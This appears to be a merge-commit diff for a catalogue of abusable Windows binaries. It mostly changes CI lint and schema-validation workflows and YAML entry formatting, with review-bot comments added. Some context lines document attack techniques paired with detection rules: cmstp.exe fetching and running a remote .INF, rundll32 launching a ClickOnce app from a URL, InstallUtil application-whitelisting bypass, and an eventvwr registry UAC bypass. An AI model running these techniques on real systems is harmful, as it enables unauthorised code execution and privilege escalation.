Merge branch 'master' into alias_introduction

This commit is contained in:
Conor Richard 2022-09-15 13:54:50 -04:00 committed by GitHub
commit 3347e43b3f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
170 changed files with 622 additions and 602 deletions

.github/.yamllint vendored

@ -4,12 +4,12 @@ yaml-files:
- '*.yml' - '*.yml'
rules: rules:
new-line-at-end-of-file: new-line-at-end-of-file:
level: warning level: error
trailing-spaces: trailing-spaces:
level: warning level: error
line-length: line-length:
level: warning level: warning
new-lines: new-lines:
level: warning level: error
indentation: indentation:
level: warning level: error


@ -16,7 +16,7 @@ jobs:
- name: Change .yml to .md - name: Change .yml to .md
run: | run: |
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
mv yml/OSBinaries yml/Binaries mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts mv yml/OSScripts yml/Scripts
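Review bot: The rewritten loop still iterates over an unquoted `$(find yml/ -name '*.yml')`, so any path containing whitespace is split into several words before `echo "---" >> "$x"` and the `mv` run; the quoting inside the loop body does not protect against that. A null-delimited walk is the usual fix: `find yml/ -name '*.yml' -print0 | while IFS= read -r -d '' x; do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done`. Appending `---` also assumes each file already ends in a newline, which the `new-line-at-end-of-file: error` rule promoted in this commit should now guarantee for linted files. The job this step belongs to starts before the hunk.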


@ -1,19 +1,35 @@
--- ---
name: YAML Lint name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: on: [push,pull_request]
push:
branches:
- master
pull_request:
branches:
- master
jobs: jobs:
lintFiles: lintFiles:
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- uses: actions/checkout@v1 - uses: actions/checkout@v3
- name: yaml-lint - name: yaml-lint
uses: ibiqlik/action-yamllint@v3 uses: ibiqlik/action-yamllint@v3
with: with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint config_file: .github/.yamllint
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml
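Review bot: Both third-party actions are referenced by mutable tags — `ibiqlik/action-yamllint@v3` and, in four steps, `cketti/action-pykwalify@v0.3-temp-fix`, a personal fork identified by a temporary tag — and the workflow declares no `permissions:` block, so the repository's default `GITHUB_TOKEN` scope (historically read/write) is handed to code this repository does not control, now on every push and pull request since the `master` branch filter was dropped. Pin each `uses:` to a full commit SHA with the tag kept in a trailing comment, and add a top-level `permissions:` block with `contents: read`, since linting and schema validation only need to read the checkout. The four pykwalify steps differ only in `files:`; collapsing them into one step would keep them in sync, if the action accepts several globs — confirm against its README.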

.github/yaml-lint-reviewdog.yml.bak vendored Normal file

@ -0,0 +1,35 @@
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run yamllint
uses: reviewdog/action-yamllint@v1
with:
level: error
reporter: github-pr-review # Change reporter.
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml
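Review bot: This file is committed under `.github/` with a `.bak` suffix and outside `.github/workflows/`, so GitHub Actions will never load it; it is a stale copy of the lint workflow that will drift from `yaml-lint.yml` (it already differs in the reporter used and in how the yamllint config path is passed). Either delete it or move it under `.github/workflows/` with a real name. If it is revived, `reporter: github-pr-review` needs pull-request write access, which the token on pull requests from forks does not carry, and the unpinned `cketti/action-pykwalify@v0.3-temp-fix` references should be pinned to a commit SHA like the ones in the live workflow.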


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---


@ -23,4 +23,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Bart - Person: Bart
Handle: '@bartblaze' Handle: '@bartblaze'
---


@ -15,4 +15,3 @@ Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe' - Path: '%localappdata%\Whatsapp\Update.exe'
Detection: Detection:
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---


@ -25,4 +25,3 @@ Acknowledgement:
Handle: '@@vysecurity' Handle: '@@vysecurity'
- Person: Adam (Internals) - Person: Adam (Internals)
Handle: '@Hexacorn' Handle: '@Hexacorn'
---

YML-Schema.yml Normal file

@ -0,0 +1,118 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'
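Review bot: `Aliases` is declared here as a top-level sequence of maps with an `Alias` key, but the template updated in this same commit adds `Aliases` under each `Commands` entry as a plain list of strings; the `Commands` item mapping here has no `Aliases` key and pykwalify rejects undeclared keys unless `allowempty: true` is set, so any file written from the template will fail the new validation step — pick one shape and change the other side. The `Handle` pattern `^(@(\w){1,15})?$` will also reject the value `'@@vysecurity'` that appears unchanged elsewhere in this commit, so that entry needs fixing before the check is enabled. Separately, `[$-_@.&+#]` in the URL patterns is a character range from `$` to `_`; it is what admits `/` and `:`, but it also admits `<`, `>`, `?`, `;` and `=`, so spelling the allowed characters out individually would make the accepted set explicit.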


@ -8,6 +8,8 @@ Created: YYYY-MM-DD (date the person created this file)
Commands: Commands:
- Command: The command - Command: The command
Description: Description of the command Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase Usecase: A description of the usecase
Category: Execute Category: Execute
Privileges: Required privs Privileges: Required privs
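Review bot: The `Aliases` example is placed under a `Commands` entry as a bare list of strings, while the `YML-Schema.yml` added in this same commit only knows `Aliases` as a top-level sequence of `- Alias: <str>` maps and declares no such key inside `Commands`; a file written from this template therefore fails the new schema checks. If aliases name the binary rather than the command (the example `ProcDump.exe & ProcDump64.exe` suggests so), move the block to the top level and write it as `Aliases:` followed by `  - Alias: ProcDump64.exe`; otherwise add the key to the schema's `Commands` mapping.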


@ -20,4 +20,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Wade Hickey - Person: Wade Hickey
Handle: '@notwhickey' Handle: '@notwhickey'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: cpl - Person: cpl
Handle: '@cpl3h' Handle: '@cpl3h'
---


@ -23,7 +23,7 @@ Detection:
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources: Resources:
- Link: https://freddiebarrsmith.com/at.txt - Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
Acknowledgement: Acknowledgement:
- Person: 'Freddie Barr-Smith' - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
---


@ -14,8 +14,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
@ -27,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
---


@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@aionescu' Handle: '@aionescu'
- Person: Asif Matadar - Person: Asif Matadar
Handle: '@d1r4c' Handle: '@d1r4c'
---


@ -46,7 +46,7 @@ Detection:
- IOC: bitsadmin creates new files - IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream - IOC: bitsadmin adds data to alternate data stream
Resources: Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement: Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@carnal0wnage' Handle: '@carnal0wnage'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ensar Samil - Person: Ensar Samil
Handle: '@sblmsrsn' Handle: '@sblmsrsn'
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: David Middlehurst - Person: David Middlehurst
Handle: '@dtmsecurity' Handle: '@dtmsecurity'
---


@ -39,7 +39,7 @@ Commands:
Privileges: User Privileges: User
MitreID: T1140 MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures Usecase: Decode files to evade defensive measures
Category: Decode Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Lior Adar - Person: Lior Adar
---
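Review bot: The corrected command now carries the output argument `decodedOutputFileName`, but the unchanged `Description:` on the following line still ends with that same token (`...hexadecimal-encoded file decodedOutputFileName`), which reads as a leftover from the old single-argument form rather than a sentence. Rephrase it, e.g. `Description: Command to decode a hexadecimal-encoded file into decodedOutputFileName`, or drop the trailing token.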


@ -21,8 +21,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
@ -34,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: r0lan - Person: r0lan
Handle: '@yeyint_mth' Handle: '@yeyint_mth'
---


@ -14,8 +14,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
Resources: Resources:
@ -24,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---


@ -23,4 +23,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---


@ -14,15 +14,13 @@ Commands:
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
@ -44,4 +42,3 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@NickTyrer' Handle: '@NickTyrer'
---


@ -29,4 +29,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
---


@ -24,4 +24,3 @@ Acknowledgement:
Handle: '@hexacorn' Handle: '@hexacorn'
- Person: Wietze - Person: Wietze
Handle: '@wietze' Handle: '@wietze'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---


@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
---


@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Gal Kristal - Person: Gal Kristal
Handle: '@gal_kristal' Handle: '@gal_kristal'
---


@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@tim8288' Handle: '@tim8288'
- Person: Hai Vaknin - Person: Hai Vaknin
Handle: '@vakninhai' Handle: '@vakninhai'
---


@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---


@ -32,4 +32,3 @@ Acknowledgement:
Handle: '@dim0x69' Handle: '@dim0x69'
- Person: Nikhil SamratAshok - Person: Nikhil SamratAshok
Handle: '@nikhil_mitt' Handle: '@nikhil_mitt'
---


@ -66,5 +66,4 @@ Acknowledgement:
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Mike Cary - Person: Mike Cary
Handle: 'grayfold3d' Handle: '@grayfold3d'
---


@ -7,7 +7,7 @@ Commands:
- Command: eventvwr.exe - Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass Category: UAC Bypass
Privileges: User Privileges: User
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@enigma0x3' Handle: '@enigma0x3'
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---


@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@infosecn1nja' Handle: '@infosecn1nja'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@CyberRaiju' Handle: '@CyberRaiju'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---


@ -1,6 +1,6 @@
--- ---
Name: Extexport.exe Name: Extexport.exe
Description: Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
---


@ -1,6 +1,6 @@
--- ---
Name: Extrac32.exe Name: Extrac32.exe
Description: Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -54,4 +54,3 @@ Acknowledgement:
Handle: '@VakninHai' Handle: '@VakninHai'
- Person: Tamir Yehuda - Person: Tamir Yehuda
Handle: '@tim8288' Handle: '@tim8288'
---


@ -1,6 +1,6 @@
--- ---
Name: Findstr.exe Name: Findstr.exe
Description: Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -45,4 +45,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -28,4 +28,3 @@ Acknowledgement:
Handle: '@Ocelotty6669' Handle: '@Ocelotty6669'
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Carlos Perez - Person: Carlos Perez
Handle: '@Carlos_Perez' Handle: '@Carlos_Perez'
---


@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@vector_sec' Handle: '@vector_sec'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -38,4 +38,3 @@ Acknowledgement:
Handle: '' Handle: ''
- Person: Amit Serper - Person: Amit Serper
Handle: '@0xAmit' Handle: '@0xAmit'
---


@ -176,4 +176,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jesus Galvez - Person: Jesus Galvez
Handle: Handle:
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -35,4 +35,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -20,4 +20,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Wade Hickey - Person: Wade Hickey
Handle: '@notwhickey' Handle: '@notwhickey'
---


@ -1,6 +1,6 @@
--- ---
Name: Ie4uinit.exe Name: Ie4uinit.exe
Description: Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -17,6 +17,7 @@ Commands:
Category: Compile Category: Compile
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10,7
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai' Handle: '@VakninHai'
- Person: Lior Adar - Person: Lior Adar
Handle: Handle:
---
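Review bot: The added `OperatingSystem: Windows 10,7` uses a different format from every other entry in this commit, which lists each version in ascending order with a space after the comma (e.g. `Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10`). The new schema types this field as a free-form required string, so nothing will catch the inconsistency; write `OperatingSystem: Windows 7, Windows 10` to match the rest of the corpus. The `Commands` entry this line belongs to starts before the hunk.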


@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Kyle Hanslovan - Person: Kyle Hanslovan
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
---


@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -39,4 +39,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
---


@ -40,4 +40,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@gN3mes1s' Handle: '@gN3mes1s'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@FortyNorthSec' Handle: '@FortyNorthSec'
- Person: Bank Security - Person: Bank Security
Handle: '@Bank_Security' Handle: '@Bank_Security'
---


@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@bohops' Handle: '@bohops'
- Person: clem - Person: clem
Handle: '@clavoillotte' Handle: '@clavoillotte'
---


@ -53,4 +53,3 @@ Acknowledgement:
Handle: '' Handle: ''
- Person: Cedric - Person: Cedric
Handle: '@th3c3dr1c' Handle: '@th3c3dr1c'
---


@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml - Command: msbuild.exe pshell.xml
